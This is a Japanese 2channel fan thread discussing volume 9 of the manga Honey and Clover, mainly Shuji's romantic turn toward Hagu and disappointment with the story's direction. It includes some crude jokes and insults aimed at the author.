711 :花と名無しさん:2006/07/15(土) 14:39:05 ID:???O
9巻買ってきて読んだ。何が嫌ってマグネットが邪魔で読みにくい。
内容は置いといて…映画のキャスト。昔、堺雅人系な感じの人に彼女取られた事がありまして
本編とオーバーラップして何とも居たたまれない気持ち。

712 :花と名無しさん:2006/07/15(土) 14:48:52 ID:???0
>>709
禿同。
「おねしょの面倒まで見たry」とか言わせといて…
キツイっすよね正直。

どうせ、入院中の交代浴の時なんかに
「はぐの肌は大理石の様だ…」とか感じちゃったりしたんだろう。
そんなこともあってはぐの中に女神を見出すようになる、と。
世の中には、マリア像や菩薩像すら性的妄執の対象にするような嗜好の持ち主もいるしw

まぁ・・・・真相はウミノのみぞ知るw

713 :花と名無しさん:2006/07/15(土) 14:55:32 ID:???0
>>712
やめてくれ気分悪い

714 :花と名無しさん:2006/07/15(土) 14:56:02 ID:???0
>>709
まさにそうで・・その恋愛感情だだ漏れに激しくウヘーとなっちゃった。
今までずーっと保護者目線だったからね。
支えあう人生のパートナーとして、という色が濃ければまだ・・と思うけど、
まあ漫画なんて自分好みの展開になるばかりじゃないもんだしなあ。

といいつつもまだ今後が10巻としてまとまったときに今回みたいに
よかったと思える展開であってほしいと望んでしまう。
結局この漫画好きなんだよな。

>>711
ほんと、あのマグネット激しくいらなかった・・速攻むしりとってしまったよ。

715 :花と名無しさん:2006/07/15(土) 15:03:00 ID:???0
修のことをキモイといっている奴の気持ちがよくわからん
はぐが自傷しないように自分の腕をかませてた修と
それを拒まないで噛んだはぐ
ふたりの関係がものすごく分りやすく現れていると思う



716 :花と名無しさん:2006/07/15(土) 15:06:20 ID:???0
わからなくていいと思うが。
漫画のキャラに対して抱くイメージなんて人それぞれだし。

717 :花と名無しさん:2006/07/15(土) 15:15:22 ID:???0
そうなんだけどね
>>712
とか読んでそこまで悪意いっぱいに見なくてもいいだろうにと

718 :花と名無しさん:2006/07/15(土) 15:15:53 ID:???O
>>715はまだ9巻までしか読んでないんじゃないか?
9巻の修はぐは何にも気持ち悪くないもの。

問題は10巻の修ですよ…トホホ(´・ω・`)

719 :花と名無しさん:2006/07/15(土) 15:16:24 ID:???0
修の好きさ大好きさはあってもいいけど(そんなん分かりきってるし)
それを恋心に変換しはぐを女として見てる事を突然に匂わせたのが最大の失敗だったねウミノ…
普通に一人の芸術家・一人の人間として大好きで必要で支えていきたいってんなら
はぐに寄り添えなかった森田竹本と二人で生きていくことを決めた修はぐ、
で綺麗に終わりファンもここまでがっかりはしなかったのに。
二人の仲はその後の長い人生で変化があるかも…?と匂わせる程度でよかった。
もしかしてウミノ連載終わってよくよく原稿を読み返してここに気づいて
コミクス収録では修ちゃんの頬が赤→白に改変、「先生も男…」を削除とか
するんじゃなかろうかとか思ってしまう。アヒャ

720 :花と名無しさん:2006/07/15(土) 15:31:29 ID:???0
修は森田次第だった気がする。


721 :花と名無しさん:2006/07/15(土) 15:38:39 ID:???0
>>715
喪前は過去ログ嫁。

親子としての愛情ならキモイとも思わないし
親子としての愛情として描かれていたのに
いきなり男女の愛情として描かれたからキモイと言っている。

722 :花と名無しさん:2006/07/15(土) 15:39:33 ID:???0
>>718
そう思う。
修は気持ち悪くない、納得できると主張してる人は
3ヶ月分の雑誌掲載分を読んでないからだろう。
3ヶ月分の雑誌掲載分で
「なんじゃこりゃー!!」「キモイ!」と
ウミノのズンドコ節に突き落とされたんだから。

臭の改変もそうだけど
竹本が性格悪くなってたり
山田が幼稚になってたのもきつかったな。
竹本のはぐへの恋をしってた真山が
竹本のことを何にも思いやってなかったことも。

コミックス派で9巻だけ読んだ人には
9巻は「鬱展開でせつない」けど
おおむね好評のほうだよ。

723 :花と名無しさん:2006/07/15(土) 15:45:39 ID:???0
竹本、森田のどちらかが返り咲く可能性はそれぞれ何%ぐらいですか?

724 :花と名無しさん:2006/07/15(土) 15:49:38 ID:???0
次の回からだよね。スレが炎上しまくったのは。
たぶんコミクス派は10巻の中で全ての変遷が描かれるから本誌読者ほどのショックは
受けずに済むと思うよ。
山田の幼女化はともかくとして修マンセーな中放置されてる竹本森田も残りの回で
多少のフォローもあるだろうからね。

725 :花と名無しさん:2006/07/15(土) 16:05:28 ID:???0
>>723
竹本は性格破壊&空気化されたので
計測不能です(´;ω;`)ウッ

726 :花と名無しさん:2006/07/15(土) 16:11:19 ID:???0
修はずっとリカに片思いなのかと思ってた

727 :花と名無しさん:2006/07/15(土) 16:17:16 ID:???0
mixiでは感動したって意見が多い

728 :花と名無しさん:2006/07/15(土) 16:31:27 ID:???0
mixi内では、あんまり批判意見は書けないからさ。

mixiで生暖かく誉めあってた人同士が
2chでは「こいつ痛い」「こいつ、『アテクシ臭』がする」と
それぞれ悪口書いて、個人晒ししてるのも見たことあるし…。


あと、雑誌掲載分を読んでない人に遠慮して
雑誌掲載分のつっこんだ感想は書かない人もいるだろう。

729 :花と名無しさん:2006/07/15(土) 16:32:12 ID:???0
わざわざ知り合いコミュニティで批判的な感想は書かないだろ、という話は既出。

730 :花と名無しさん:2006/07/15(土) 16:50:37 ID:???0
とりあえず私は展開よりも漫画(アニメ)キャラの性格改変が一番辛い人間で…
しかもそれが一番好きな竹本君か…こりゃ覚悟が要りそうだな

731 :花と名無しさん:2006/07/15(土) 16:56:26 ID:???0
9巻読んできた
何この鬱展開
マジであり得ない

なんではぐが怪我しなきゃいけないわけ??
なんで森田兄弟があんな過去を背負わなきゃいけないわけ??

もう誰に何を責めればいいのかわからない

こんな展開になるなんて思いもしなかったから
バイト前に読んだのが間違いだった

もう無理
バイト休む

732 :花と名無しさん:2006/07/15(土) 16:57:37 ID:???0
>>731
すまん
最後2行でわろてしまった

733 :花と名無しさん:2006/07/15(土) 16:59:32 ID:???0
>>731は10巻読んだらどうなるんだろう

734 :花と名無しさん:2006/07/15(土) 17:03:24 ID:???O
人間臭くていいじゃない

735 :花と名無しさん:2006/07/15(土) 17:03:56 ID:???0
>>733
この先さらに鬱展開がまってるわけ?

なんかもう羽海野が嫌いになりそうだ

っていうかここネタバレありなのか?
それならもう見ないでおこう

736 :花と名無しさん:2006/07/15(土) 17:08:20 ID:???0
この人同人やってたことあるよね…昔見たことがあるような絵。。

737 :花と名無しさん:2006/07/15(土) 17:10:25 ID:???0
>>735
ネタバレ地雷だらけだよ
10巻発売頃にまたおいで

738 :花と名無しさん:2006/07/15(土) 17:13:59 ID:???0
>>737
トンクス

なんとかしてこの憤り感をどうにかしてくる

ではさようなら

739 :ピンクな名無し:2006/07/15(土) 17:19:55 ID:ZLybS7w00
人気ある漫画ってあとからいやな展開になりますよね〜
あまりだらだらつながらないほうが良いと思いました。
しかし皆さん文句いいながらも結局読んでるんじゃないですか。
私はハチクロ好きですよ。


740 :花と名無しさん:2006/07/15(土) 17:24:36 ID:???0
>>739
どこのデフォ名無しだ?w

741 :花と名無しさん:2006/07/15(土) 17:27:52 ID:???0
オレはチカを信じているよ。どんな展開になろうとも見続ける。

742 :花と名無しさん:2006/07/15(土) 17:28:33 ID:???0
>>739
そりゃ9巻までは大好きだった漫画だからね。
終わりまでは読むよ

743 :花と名無しさん:2006/07/15(土) 17:32:00 ID:???0
事故で怪我とかわかりやすい不幸を使わないで、
はぐの強さや絵を描くことへの思いを表現して欲しかったな。

744 :花と名無しさん:2006/07/15(土) 17:32:02 ID:???0
つい最近はまったもので8巻まで揃えたあとこのスレ覗いて
現行の話はそんなに劣化してるのかとがっかりしてたんだけど、
9巻読んで修はぐも何も全部受け入れられると思った自分は
浅はかというか単純馬鹿なんだろうな。

長いこと連載を見守って来た人たちとにわか紛いの自分じゃ
思い入れも違うんだろうけど。

今回は森田家の過去といいはぐの事件を受けての
仲間達の反応といい切なくて堪らなかった。
森田兄好きだ。

745 :花と名無しさん:2006/07/15(土) 17:36:01 ID:???0
アニメのヒロシ修もあんなにいい演技でがんばってたのに
映画でいきなり修萌えモード全開ってウミノわかりやすすぎ。

746 :花と名無しさん:2006/07/15(土) 17:38:27 ID:???0
>>700
はぐが『もう描かなくていい』って言った森田にがっかりしたってこと?

はぐは『何かを残さなきゃ意味がないなんてことはない』って森田に言われて
救われたんじゃないの?

747 :花と名無しさん:2006/07/15(土) 17:45:02 ID:WLcWhYXD0
>>608
馨兄さん情報サンクス!!早速コーラス買ってみようか。
9巻では、フラッと消えたように描かれてたから
とにかく無事で何より。

748 :花と名無しさん:2006/07/15(土) 17:45:41 ID:???0
>>746
(゚д゚)

749 :花と名無しさん:2006/07/15(土) 17:47:06 ID:???0
>>747
他が狂っぽ狂っぽだからやめとけw

750 :花と名無しさん:2006/07/15(土) 17:49:21 ID:a6EZtddh0
9巻を楽しめてる香具師が多いのが以外だ、、、、。
俺はだめだ。なんでこんな展開にしちまったんだ、、。

751 :花と名無しさん:2006/07/15(土) 17:50:02 ID:???0
描くことに人生の意味を置いてそれでしか生きられないはぐ
なんでもできてついでに描いてそれが天才な森田

『もう描かなくていい』っていうのはある意味森田の贅沢というか傲慢だよな
森田は光の国の目線すぎてはぐみの暗黒面に気づいていないし
この二人は惹かれあうだろうけど
足並みそろえてって関係にはなれない的な

う〜んドラマチックぅ

752 :花と名無しさん:2006/07/15(土) 17:53:25 ID:???0
住人が一気に入れ替わったような好意的レスが続きますね

753 :花と名無しさん:2006/07/15(土) 17:53:42 ID:???0
いやはぐみの暗黒面に気づいたからこそ
描けなくても生きてろと言ったのだろうが
こだわってる人間にこだわるなというのは親切かどうか微妙でもある

754 :花と名無しさん:2006/07/15(土) 17:54:58 ID:???O
>>736
スラムダンクのホモ同人

755 :花と名無しさん:2006/07/15(土) 17:55:01 ID:???0
たけのこは学生時代のうちに恋をして(失恋まで)、
一人旅をして、天職をみつけたから十分青春を味わったよ。

このまま東京にいると真山・山田のような未来が待っているだけ。
あとは黙って盛岡へ行けばいいと思う。
すてきな仲間が待っているんだし。

756 :花と名無しさん:2006/07/15(土) 18:01:35 ID:???0
せつなさを抱きしめて

757 :花と名無しさん:2006/07/15(土) 18:03:41 ID:???0
>>755
そうそう。食が細いしんさんを救えるのはてけもとだけ。

>>756


758 :花と名無しさん:2006/07/15(土) 18:05:05 ID:???0
藤原デザインと真山が一服の清涼剤だった。
密かにギャグになってるときのリカさんが好き

759 :757:2006/07/15(土) 18:05:10 ID:???0
すまない
途中送信してしまった

>>756
元ネタかなにかあるんすか?

760 :花と名無しさん:2006/07/15(土) 18:08:00 ID:???0
今までこんな感想持ったこと無かったんだが...

(スペインでの)リカさんの寝てる姿(ギャグ風味)がかわいすぎる。

761 :花と名無しさん:2006/07/15(土) 18:10:18 ID:???0
いつだったか、リーダーに舐められて会話ができないのみて
あそこで初めてリカを好きになった

762 :花と名無しさん:2006/07/15(土) 18:33:15 ID:???0
>>746
私がはぐだったら森田さんの言葉に救われてると思う。
比べちゃあ笑いモノのレベルかもしれないが、同人やってるんで
「書けない自分には存在価値がない」って悩む気持ちは分かるし、
そういう時に「生きていてくればそれでいい」って言ってもらえたら凄く救われる。

でも芸術至上主義で、森田さんに同じ芸術家としてシンパシーを感じていたはぐにとっては
「描かなくていい」なんて言葉は残酷だったんだろうね。
「這ってでも立ち上がれ!絶対に戻って来い!」って無理やりにでも引っ張ってくれなきゃ
駄目なんだろうな。
はぐ自体が不安定な時期だし、もともと自立出来てないんだから、
傷ついた森田さんを受け止めてあげる事も出来ないし、結局修ちゃんを選ぶっていう…。

なんていうか、つくづく残酷な展開だな。
ハチクロに潜む残酷さはスパイス程度で良かったのに、9巻で一気に残酷過ぎる現実を
むき出しにされたら、正直ついていけないよ…。


763 :花と名無しさん:2006/07/15(土) 18:35:08 ID:???0
残酷つかはぐがひたすら自分の事しか考えてないようにしかみえん

764 :花と名無しさん:2006/07/15(土) 18:40:28 ID:???0
修はどうしたって恋愛感情出しちゃいけなかったと思う。
はぐがケガしてなかったならまだしも、
ケガして修に頼るしかなくなってる時にそんな事言われたら
断れないにきまってるんじゃないの?
だって「森田さんが好きだけど面倒は見てください」とは言えないでしょ。

765 :花と名無しさん:2006/07/15(土) 18:42:54 ID:???0
一緒に戦ってくださいってピンピンしてる時から思ってたんだね。
運良く?事故に遭ったから、こりゃ言ってもいいでしょって思うようになったのかな。

766 :花と名無しさん:2006/07/15(土) 18:43:51 ID:???0
芸術家はぐに臭が必要なことは森田も言ってたし
9巻で竹本も言っているから
サポートとしてはぐのそばに一生いることは納得いってたけど
「好きだ。大好きだ。」は想定外だな。


767 :花と名無しさん:2006/07/15(土) 18:44:30 ID:???0
森田はつくづく不幸な奴だな。
もうちょっと体勢立て直す暇があったら
あんな暴走はしなかったんじゃないか。
とことん会社のっとり事件に人生邪魔されてんな。

そして修と竹本に危険人物扱いされててカワイソス

768 :花と名無しさん:2006/07/15(土) 18:49:21 ID:???0
修が「好きだ(ポッ」とか言い出したら
それって一番足場がゆらいでるんじゃないのか…と思ったり。
だって今まで無償の愛をくれる父親だったのが、急に「やっぱり男だった」って。

769 :花と名無しさん:2006/07/15(土) 18:50:35 ID:???0
>>765
だろうね。
それにプラスして
「実家の状況が変わった」てのもあるようだ。

>>766
>「好きだ。大好きだ。」は想定外

こればかりは自分もポカーンだった

770 :花と名無しさん:2006/07/15(土) 18:57:57 ID:???0
お金だけちゃっかり借りるとこが最高にやだ

771 :花と名無しさん:2006/07/15(土) 19:01:20 ID:???0
>767
>森田はつくづく不幸な奴だな。

ほんと
こと金に関しては運の良いヤツだが
今回はマジで間が悪すぎだ・・・。不憫すぎる。


772 :花と名無しさん:2006/07/15(土) 19:01:47 ID:???0
修がモンゴル行って
落ち込んで作品の進まないはぐが
森田が彫ってるところをみて
「よ〜しはぐもがんばる〜」とかいうシーンは、
修がいなくてもひとりで頑張れるようになったっていう成長と
森田からは良い影響をうけられるってことを描いてたんじゃないのか!
あれは一体なんだったんだよ。

773 :花と名無しさん:2006/07/15(土) 19:04:24 ID:???0
無償の愛のままならよかったのにねぇ…

774 :花と名無しさん:2006/07/15(土) 19:08:28 ID:???0
元々そういうつもりで描いていたかは別として、人生ください発言や治療を辛いと言うのを
ためらうレベルの人間関係である事を考えるとはぐは前々から親子的感情以上(以外)の
ものを感じていたんじゃないかな。
もしそうなら今までの事も、修は本心を隠して、はぐは本心を知りつつの
双方合意の哀しい親子ごっこだったとも捉えられるね。

森田の件もあのままじゃ負担になるだけだからというはぐなりの考えという事で
今はありだと思ってる。

でもこの漫画の女性陣の「してもらう」「してもらわない」だけで自分のほうから
あげるっていう発想が無いのには微妙だ。
と思ったけどたけのこは毛布かけてもらったりお昼分けてもらったり(森田に横取りされたけど)
してたね。・・・・だから100%駄目なのか。

775 :花と名無しさん:2006/07/15(土) 19:10:36 ID:???O
どっちかつうと修 は
自分をやっと必要としてくれて嬉しいんじゃないかと思うんだが

竹本がいつか言ってたが 頼りにされてたんですね?みたいな事言ってたよな

あれ 自分も羨ましいと思った
人に必要とされるって

776 :花と名無しさん:2006/07/15(土) 19:10:41 ID:???0
普通状態の森田なら修より適任だと思う。
なんだかんだ言って芸術の道をきわめたいなら金が必要だし
治療費だって半端ないだろうし。
馨との話を読んだら、普段の行動は異常ながら人間出来てるようだし。

でもなぁだからこそ森田を選ぶと「金をとった」みたいになっちゃって展開的にありえなさそう。

777 :花と名無しさん:2006/07/15(土) 19:11:46 ID:???O
ウミノさん。
乙女座だから大きな変化に弱いっつーのも、休刊×2
でかなりダメージうけたっつーのもよーーく分かった。
だからといって本編のきんもー☆展開は納得できねえ。
臭あぼん+はぐ自立エンドでなければ、即ブコフ行きにす
る事に決めた。

778 :花と名無しさん:2006/07/15(土) 19:14:11 ID:???0
>>774
ケガする前ははぐみは、
「(たとえば修ちゃんが人生くれるって言っても)
自分は代わりに何をしてあげられるんだろう」みたいなこと言ってたよ。
ケガで寄生を決め込んだようだが

779 :花と名無しさん:2006/07/15(土) 19:14:11 ID:???0
>>776
最初出会ってお金じゃないところではぐが意識してたところもあったわけだし
別に金取ったとは思わないけど

780 :花と名無しさん:2006/07/15(土) 19:15:11 ID:???0
>>772
>修がいなくてもひとりで頑張れるようになったっていう成長

できる限り多くの箱を開けたいという野望を持ってしまったはぐにとっては
そのへんはどうやら問題じゃなくなってしまったらしい…

>森田からは良い影響をうけられる
だが、(はぐが)ボロボロになった時のケア要員としては不適任てことらしいよ

それにしてもはぐは周りに求めすぎな気が…
天才だから?でも作中のモノローグとか読んでも、
単なる不思議ちゃん系の女の子・・・としか・・・

781 :花と名無しさん:2006/07/15(土) 19:16:31 ID:???O
そもそも金に関して無理があるわけで・・・
父親いるのに

782 :花と名無しさん:2006/07/15(土) 19:20:11 ID:???0
いくらはぐがずうずうしくたって、
相手が自分の事好きだからって
彼氏でもない人に急に頼るわけにはいかなくない?
はぐには既に修しか選択肢が無いよ。
修はぐに追い込むためのケガだよ。

783 :花と名無しさん:2006/07/15(土) 19:20:39 ID:???0
>>758
同意・・これまで鬱パート担当だったリカさんが9巻では和める存在に…。
(真山は相変わらずキモかったけど)
リカさんのギャグ風姿ってカワイイんだよね。
実家で犬と一緒にいた姿とか、ムンクの構図の川に原田が飛び込んで
ついていきそうになったときとか。

>>772
当時のはぐの「自立」描写がいいなと思っていただけに、この展開は・・orz。

やっぱり事故展開があまりに急転直下すぎるような。
事故をきっかけにはぐは精神面でメチャクチャ後退したように見えてしまうし、
森田は間悪すぎだし(会社問題が落ち着いてればなんとしても絵を描けって
言ってそう)、竹本は性格歪んじゃうし、修は恋愛感情突然炸裂!だし。

森田兄弟の話は複線もあったしわかるんだけど、はぐの方はなんで
この展開なんだろうなあ・・。
ウミノさんが今後ビックリするような神展開してくれることを淡ーく期待。(無理?)

784 :花と名無しさん:2006/07/15(土) 19:21:05 ID:???0
>>781
はぐ溺愛のはずのね。

785 :481:2006/07/15(土) 19:24:43 ID:???0
臭の「好きさ。大好きさ」
ってのもきっと恋愛要素を含まないもの…
つまりloveじゃなくてlikeなんだよー。
「好き」って口にするのは誰にとっても恥ずかしいこと
だから頬を赤らめちゃったりしたんだよー。



orz

786 :花と名無しさん:2006/07/15(土) 19:25:13 ID:???0
あ、ごめん。481じゃないっす。

787 :花と名無しさん:2006/07/15(土) 19:29:23 ID:???0
>775 自分もそう思う
ようやく、
修の中の「これって俺のエゴじゃないの?」というドロドロとした葛藤にも
カタルシスが・・・って感じで。

ちなみに
修のエゴ=NOTはぐが表彰されたりするのをまるで自分の栄光の様にすりかえること
と付記しておく。一応

788 :花と名無しさん:2006/07/15(土) 19:39:14 ID:a6EZtddh0
>>785
likeじゃなくて家族へのloveでは?

789 :花と名無しさん:2006/07/15(土) 19:39:27 ID:???0
必要とされて喜ぶのは、いいの別に。
問題は、はぐは修を“恋愛対象として”必要としてるのかってことだよ。



790 :花と名無しさん:2006/07/15(土) 19:45:22 ID:???0
今月号で「それはない」と判明したんじゃなかったのか

791 :花と名無しさん:2006/07/15(土) 19:46:40 ID:???0
だから、喜び方を間違ってる、と。

792 :花と名無しさん:2006/07/15(土) 19:49:27 ID:???0
切れたのが、はぐの腱じゃなくて臭のチンコだ
ったらよかったのに

793 :花と名無しさん:2006/07/15(土) 19:55:30 ID:???0
>>762
このまま描けなくなったら自分は生きてる意味がないんじゃないか
(森田に対しても見せっことかできないし意味のない人間になってしまうのでは)
って苦しんでるはぐを助けたくて『描かなくていい』って言ったんだよね。
はぐも森田が普通の状態じゃないことに気づいてるし
後から『ほんとに嬉しかった忘れないね』って言ってるし
森田の言葉に傷ついたり失望したりはしてないと思うんだけど。

794 :花と名無しさん:2006/07/15(土) 19:55:42 ID:???0
なんか重症だなぁ

795 :794:2006/07/15(土) 19:56:47 ID:???0
誤爆orz

796 :花と名無しさん:2006/07/15(土) 19:57:51 ID:???0
>>795
結構違和感ないよw

797 :花と名無しさん:2006/07/15(土) 19:58:05 ID:???0
ウミノの日記読んだ。
ローマイヤ先輩も貧乏アパートも
ウミノの実体験なんだね。

798 :花と名無しさん:2006/07/15(土) 20:05:19 ID:???0
はあん!
ドクンドクン
愛の中に大量の精子を放出した
はぁはぁ・・・・

799 :花と名無しさん:2006/07/15(土) 20:06:03 ID:???0
>>798
誤爆はオマイだ

800 :花と名無しさん:2006/07/15(土) 20:16:20 ID:???0
>>670
亀だけど、山田は運が良かっただけ。
陶芸だって、大変な世界だよ。

801 :花と名無しさん:2006/07/15(土) 20:22:07 ID:???0
9巻読んだけど、はぐが臭に何をもって
一緒に戦ってほしいと思ってるかがわからん。
マネージャー?
それって人生を変えさせるほどのものか?

9巻読んだ限りでは臭はぐは見えてこないのでともかく
きゅうに別作品になったかのような違和感がぬぐえない。
死にネタとか不幸な事件でしかドラマチックにできないのはどーよ…


802 :花と名無しさん:2006/07/15(土) 20:26:46 ID:???0
登場人物が知らないところでどんどん変化してて付いていけない。
習字は途中まではぐには芸術家としての成功より普通に幸せになって欲しいって感じじゃなかったっけ。
ていうか、ミドリちゃんにも「甘やかすだけが愛情じゃないのに」みたいなキャラ紹介されてたよね?
修司の立ち位置はどこで変わったの?ケガの前から悟ったようなこと言ってたよね。



803 :花と名無しさん:2006/07/15(土) 20:26:56 ID:???0
>>789
はぐは、森田が好きって真山か飲み屋が言ってたじゃん。

804 :花と名無しさん:2006/07/15(土) 20:26:57 ID:???0
>>801
生活費捻出と家事労働とその他雑用係をして欲しいんじゃ?

805 :花と名無しさん:2006/07/15(土) 20:31:41 ID:???0
>>804
雑用係ww

それらもあるかもしらんが、
やっぱはぐの創作活動におけるブレーン的な役割を求めてるんじゃないのかね。
ヤツは技術方面やその他美術に関する知識量がハンパないようだから


806 :花と名無しさん:2006/07/15(土) 20:33:29 ID:???O
基本的に真山や山田 理科、飲み屋辺りが 普通な感覚の恋愛で
修や森田 はぐは 特殊なんじゃねえの?

807 :花と名無しさん:2006/07/15(土) 20:36:07 ID:???0
>>803
問題っていうのは、
疑問点ってことじゃなくて、
「ここが間違ってるところ」って意味で使ったつもりです。
はぐは修をそういう意味で必要としてるわけじゃないのに、修の喜び方は変だよね
って言いたかったんですけど…
分かりにくい書き方してすみません(´;ω;`)

808 :花と名無しさん:2006/07/15(土) 20:36:49 ID:???O
森田を選ぶと金っぽいって意見があるが、臭を選ぶ方が自分には打算的に感じられる。
臭が自分を女として好きだって気が付いている上で、自分にとって都合良い部分だけ利用しているようでモニョる。

まぁはぐが意外と大人な計算が出来る脳みそのあるキャラだったって事かもしれないが。
何を返せるんだろうって思ってて、相手に恋愛感情があるなら恋抜きで人生貰うなんてどーなんだよと言いたくなるし…はぐがよく分からん。

809 :花と名無しさん:2006/07/15(土) 20:37:57 ID:???0
>>806
特殊なほうの3角(もはや4角ではなくなったようだ)は
べたべたした傷のなめあいみたいで気持ち悪い。

810 :花と名無しさん:2006/07/15(土) 20:42:07 ID:???0
はぐは自分の恋を諦めて
修に人生もらう代わりに
修の気持ちに応えることにしたんじゃないのか?
てっきりそうだと思ってた。


811 :花と名無しさん:2006/07/15(土) 20:47:10 ID:???0
修の喜びかたはホント謎なんだよなー。
あれがなければはぐの打算(ある意味で修森はぐ全員が不幸にならない選択)だと解釈できるんだけど。
野宮の解釈レベルの事は修も気付いていだろうけど、選んでもらったらその辺どうでも良かったのかな。

812 :花と名無しさん:2006/07/15(土) 20:48:54 ID:???0
>>807
修司、「まるで恋愛面での勝者になったかのような喜び方」なんてしてましたっけ…

「はぐは返さん」とかタチの悪い冗談言ってたのはわかるが…

813 :花と名無しさん:2006/07/15(土) 20:49:59 ID:???0
それにしてもなんで野宮が気付くのか謎。
山田話しすぎじゃね?

814 :花と名無しさん:2006/07/15(土) 20:50:57 ID:???0
はぐって何で留学するの嫌だったん?

815 :花と名無しさん:2006/07/15(土) 20:50:57 ID:???0
妥協された、つまり利用目的で選ばれたのにあんな嬉しそうな修って…

816 :花と名無しさん:2006/07/15(土) 20:53:13 ID:???0
>>812
まてまて
「まるで恋愛面での勝者になったかのような喜び方」してるとは書いてなくねいか?


817 :花と名無しさん:2006/07/15(土) 20:53:39 ID:???0
>>810
簡潔に表すとそういうことかと。

818 :花と名無しさん:2006/07/15(土) 20:55:12 ID:???0
てことは修と恋愛関係になる覚悟があると。



キメエ(´д`;)

819 :花と名無しさん:2006/07/15(土) 20:55:50 ID:???0
>>816
あぁごめん 言葉の定義って大切だよね

や でも・・・
そう捉えずにどう捉えればいいのかな・・・と

820 :花と名無しさん:2006/07/15(土) 20:56:29 ID:???0
とりあえず、異性と見てなくても愛はある。
はぐ本体を手に入れておけば後から沸いてくるかも☆
…と希望的観測持ってるのかね。

821 :花と名無しさん:2006/07/15(土) 20:57:12 ID:???0
修は無条件にはぐの幸福を願う役じゃなかったのかー!
ここでお前のすべき反応は顔赤くして照れることじゃなくて
はぐが気を使わずに恋愛できるように父親役・世話役に徹することじゃないのかー!

822 :花と名無しさん:2006/07/15(土) 20:59:41 ID:???0
>>818

いやー
修ははぐに対して恋愛感情があるとはいえ
関係を迫ったりは・・・せんだろうと思いたい

823 :花と名無しさん:2006/07/15(土) 21:00:14 ID:???0
>>821
そうだそうだー!

824 :花と名無しさん:2006/07/15(土) 21:00:17 ID:???O
>>817
自分の恋を諦めて人生貰って更に返すって事なら、はぐは諦めるだけじゃなく、当然修を男性として見るって事だよな。

825 :花と名無しさん:2006/07/15(土) 21:01:53 ID:???0
>>822
先 生 も 男 なのに?

826 :花と名無しさん:2006/07/15(土) 21:02:42 ID:???0
たった今9巻読み終わりました。
本気で前巻読み飛ばしたのかと思った……・。
はぐって森田に惚れてたんじゃなかったっけ?
なんか今頃な疑問ですいません…

827 :花と名無しさん:2006/07/15(土) 21:03:38 ID:???0
>>824
さあ?そこまでは。
はぐのことだし、どんなファンタジーになるか…

828 :花と名無しさん:2006/07/15(土) 21:03:48 ID:???0
少女漫画によくある、「まったく性欲とか存在しない世界」の中でならこの流れも許せたけど、
実際真山と理香とか生々しい話があるだけにちょっと気持ち悪いな。

829 :花と名無しさん:2006/07/15(土) 21:10:24 ID:???0
>>821
本当だよ
何を急に血迷ったんだこいつは?

830 :花と名無しさん:2006/07/15(土) 21:14:46 ID:???O
>>827
はぐが修の恋愛感情分かってて人生を貰う決意したなら、そこの部分でも返す決意が無いとある意味酷い女だと思う。

それとも、修ちゃんは私に何も求めないで何でもしてくれるし、私の事好きだし守ってくれるし〜みたいな感じなのか。
森田への気持ちを諦めた程度で許されると?
酷い酷すぎるよはぐ。

才能があるから、治ったら良い作品で返すとかそんなつもりか?修がそれで良いとしても、そんな自分に疑問を持たないはぐってのもな〜。
生殺しで一生いく気?

831 :花と名無しさん:2006/07/15(土) 21:16:49 ID:???0
>修ちゃんは私に何も求めないで何でもしてくれるし、私の事好きだし守ってくれるし〜
うわ、最悪www
でもそれっぽい気がしてならない

832 :花と名無しさん:2006/07/15(土) 21:17:41 ID:???0
「知ってるとは思うけど―――― いや 知らないかな?」
のくだり・・・

いや知られてちゃキワドイだろw とツッコミたくなる

833 :花と名無しさん:2006/07/15(土) 21:22:31 ID:???0
修はぐはものすごく閉鎖的できもち悪い…
ここできっと森田が突破口になってくれるんだなー
と9巻読み終わってそう思いながら来てみたら

そんな展開…orz

834 :花と名無しさん:2006/07/15(土) 21:26:06 ID:???0
森田も竹本も修がはぐのために見繕ってあてがっていたと考えると…

835 :花と名無しさん:2006/07/15(土) 21:28:04 ID:???0
>>834
( ゜д ゜)

修黒いなw
リカに真山を見繕ったように、か。

836 :花と名無しさん:2006/07/15(土) 21:30:10 ID:???0
ウミノが堺萌えで、
「はぐ=自分、堺=修」と思ってるから
自分のドリーム小説もとい
ドリーム少女漫画を描いて
商業誌で発表したんだろ。

837 :花と名無しさん:2006/07/15(土) 21:30:25 ID:???0
10巻の表紙は森田とはぐだと思ってたのにな

838 :花と名無しさん:2006/07/15(土) 21:31:08 ID:???0
別の解釈ができないかと
深く考察すればするほど
臭が気持ち悪いし
はぐが腹黒い
イヤダーヽ(`Д´)ノ

839 :花と名無しさん:2006/07/15(土) 21:31:39 ID:???O
修が人生全部あげる位に女として惚れてるのに、その部分の責任も取らずに修から良い所どりか?と。

自立エンドが無理なら、せめて<好きさ大好きさ>に応える覚悟を はぐが持たないと、森田も浮かばれない(竹本も)

本当に好きな人は諦めて芸術の道を選んだ、ってのは、修に対して女としての責任とらないとかっこよくも無いし感動出来ない。
単なるはぐ自身の仕事か恋かの選択に過ぎない。

両想いの相手の感情も、自分を人生かける程愛してくれる人の感情も考えて無いみたいで、はぐの(無自覚?)計算高さが目立って嫌だ。

単なる甘えだったら、海野さんにもはぐにもガッカリだよ。

840 :花と名無しさん:2006/07/15(土) 21:32:40 ID:???0
www2.diary.ne.jp/user/162279/

ローマイヤハムは私の憧れのハムなのです 

最初に食べたのはもうずっと昔の事で
ローマイヤハムを運ぶバイトをしていた先輩が
時々 色んな事情で余ったハムを
バイトのかえりに我が家に持って来てくれることがあって…という

まんま、あの、アパートの人々は私の経験だったのであります

お金のない頃だったので それが とてもありがたく
そして…なんといっても
初めて食べる高級ハムが…美味しくて…涙が出る程美味しくて…

---------------------------------------

(゚Д゚)ケッ!!!!
同人ヲバ厨が!!!

841 :花と名無しさん:2006/07/15(土) 21:39:21 ID:???O
>>839
自分で書いてて気が付いたが、はぐは無自覚天然子悪魔ちゃんなのかもしれない。

ウミノさんも、修の恋愛感情に対するはぐの責任とか考えもして無くて、天然なのかもしれない。

天然の甘え乙女の気持ちは分からんが、海野さんの日記を見ると依存傾向強そう(プライドとか低くそう)に見えるから、男性に対する女性としての責任なんて考えもしなさそう。

ただ、人生とかに対する責任とかは考えそう。
だけど、完全に男女間での恋愛における責任ってのが欠落してる感じだ。

842 :花と名無しさん:2006/07/15(土) 21:39:59 ID:???0
はぐと森田にはゆっくり恋愛させてやりたかったな。
たけのこはもう充分楽しんだはずだから、こころおきなく大工になれ。

843 :花と名無しさん:2006/07/15(土) 21:42:18 ID:???0
>時々 色んな事情で余ったハムを
